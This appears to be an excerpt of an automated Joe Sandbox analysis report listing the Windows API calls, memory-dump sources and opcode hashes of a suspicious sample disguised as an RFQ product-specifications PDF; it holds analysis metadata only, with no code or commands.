                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B54000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_a40000_RFQ PC25-1301 Product Specifications_PDF.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CountCriticalDebugDebuggerInitializeOutputPresentSectionSpinString
                                                                                                                • String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
                                                                                                                • API String ID: 55579361-631824599
                                                                                                                • Opcode ID: d59d613370d5c8457ce9add062f8f9e4df41224a04850a589d324f965d18777b
                                                                                                                • Instruction ID: 8b1b0d7e2a87d397c3787bc3d0d725ccbdf038ac22f75f7854dd4ce8e62e3b06
                                                                                                                • Opcode Fuzzy Hash: d59d613370d5c8457ce9add062f8f9e4df41224a04850a589d324f965d18777b
                                                                                                                • Instruction Fuzzy Hash: F6E039742003018FD320AFA8E504A837BE4AB04745F048A2EE883C6655EBB0E4848B91
                                                                                                                APIs
                                                                                                                • GetTempPathW.KERNEL32(00000104,?,00000001), ref: 00AB302F
                                                                                                                • GetTempFileNameW.KERNEL32(?,aut,00000000,?), ref: 00AB3044
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2341221996.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2341194596.0000000000A40000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000ADC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000B02000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.2341365589.0000000000B0C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B14000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B54000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_a40000_RFQ PC25-1301 Product Specifications_PDF.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Temp$FileNamePath
                                                                                                                • String ID: aut
                                                                                                                • API String ID: 3285503233-3010740371
                                                                                                                • Opcode ID: 17c3835c6f647b389651f12210f0e7e7ff3ba3967374278d580b1ca30e388667
                                                                                                                • Instruction ID: bd1c1d7cf90c682cabd144f87d31a59c8e940be0e8abd94776361b175d3580a4
                                                                                                                • Opcode Fuzzy Hash: 17c3835c6f647b389651f12210f0e7e7ff3ba3967374278d580b1ca30e388667
                                                                                                                • Instruction Fuzzy Hash: 16D05B7150131467DA20F7D49C0DFC73B6CD704760F400292B656D20D1DAB09545CAD0
                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2341221996.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2341194596.0000000000A40000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000ADC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000B02000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.2341365589.0000000000B0C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B14000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B54000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_a40000_RFQ PC25-1301 Product Specifications_PDF.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: LocalTime
                                                                                                                • String ID: %.3d$X64
                                                                                                                • API String ID: 481472006-1077770165
                                                                                                                • Opcode ID: c9b6845c2f2748e890cc6ba5bfb9f76e1d0a34a9e6369af112213a90404f49d9
                                                                                                                • Instruction ID: d6fff4549a9b78fb66feb26967738d62fbaeb0ca59b394f7150d06f0ca0312f8
                                                                                                                • Opcode Fuzzy Hash: c9b6845c2f2748e890cc6ba5bfb9f76e1d0a34a9e6369af112213a90404f49d9
                                                                                                                • Instruction Fuzzy Hash: 99D062B5D49119E9CF5097D0DD459F9B7FCFB18341F908452FD0791080D634D589A761
                                                                                                                APIs
                                                                                                                • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00AD232C
                                                                                                                • PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 00AD233F
                                                                                                                  • Part of subcall function 00AAE97B: Sleep.KERNEL32 ref: 00AAE9F3
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2341221996.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2341194596.0000000000A40000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000ADC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000B02000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.2341365589.0000000000B0C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B14000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B54000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_a40000_RFQ PC25-1301 Product Specifications_PDF.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: FindMessagePostSleepWindow
                                                                                                                • String ID: Shell_TrayWnd
                                                                                                                • API String ID: 529655941-2988720461
                                                                                                                • Opcode ID: 0d8a7fedcb16878b1c595ad6812b4785592ebe53caed075386269a6c7ea0282a
                                                                                                                • Instruction ID: 8bba659904c05f1c29d7b95bc9577ec58278f8171f711fcaeae8e2d06220bc3c
                                                                                                                • Opcode Fuzzy Hash: 0d8a7fedcb16878b1c595ad6812b4785592ebe53caed075386269a6c7ea0282a
                                                                                                                • Instruction Fuzzy Hash: CAD0C936395311B6EA64E7B0AC0FFC6BB58AB00B20F4049167646AA1E0CAA4A802CA54
                                                                                                                APIs
                                                                                                                • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00AD236C
                                                                                                                • PostMessageW.USER32(00000000), ref: 00AD2373
                                                                                                                  • Part of subcall function 00AAE97B: Sleep.KERNEL32 ref: 00AAE9F3
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2341221996.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2341194596.0000000000A40000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000ADC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000B02000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.2341365589.0000000000B0C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B14000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B54000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_a40000_RFQ PC25-1301 Product Specifications_PDF.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: FindMessagePostSleepWindow
                                                                                                                • String ID: Shell_TrayWnd
                                                                                                                • API String ID: 529655941-2988720461
                                                                                                                • Opcode ID: e06edca5fb4c802bc52f6f5205c3eb5ca17f10cc2fd23aeac901204f3733b4a3
                                                                                                                • Instruction ID: 18b8be5444dd027b3d1b6ce121b962d6464cb5a52225f55a18aa8c281118fd41
                                                                                                                • Opcode Fuzzy Hash: e06edca5fb4c802bc52f6f5205c3eb5ca17f10cc2fd23aeac901204f3733b4a3
                                                                                                                • Instruction Fuzzy Hash: B4D0C7353C131176E564E7709C0FFC677545705710F4045167646961D0C9A4A801C654
                                                                                                                APIs
                                                                                                                • MultiByteToWideChar.KERNEL32(?,00000009,?,00000000,00000000,?,?,?,00000000,?,?,?,?,?,00000000,?), ref: 00A7BE93
                                                                                                                • GetLastError.KERNEL32 ref: 00A7BEA1
                                                                                                                • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00A7BEFC
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2341221996.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2341194596.0000000000A40000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000ADC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000B02000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.2341365589.0000000000B0C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B14000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B54000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_a40000_RFQ PC25-1301 Product Specifications_PDF.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ByteCharMultiWide$ErrorLast
                                                                                                                • String ID:
                                                                                                                • API String ID: 1717984340-0
                                                                                                                • Opcode ID: f08ae56dc9760cae32be0af9009a3be6126caf75accc160745d9d78b999898e6
                                                                                                                • Instruction ID: 8b26896767c9c1867b76397a1d5d5f5fe0aa9e983088aa3e97f5e47ab559d42e
                                                                                                                • Opcode Fuzzy Hash: f08ae56dc9760cae32be0af9009a3be6126caf75accc160745d9d78b999898e6
                                                                                                                • Instruction Fuzzy Hash: 5641C4B4611216AFDB21CFA4CD54BAABBB5AF41B20F14C169F95D9B2A1DB30CD01CB70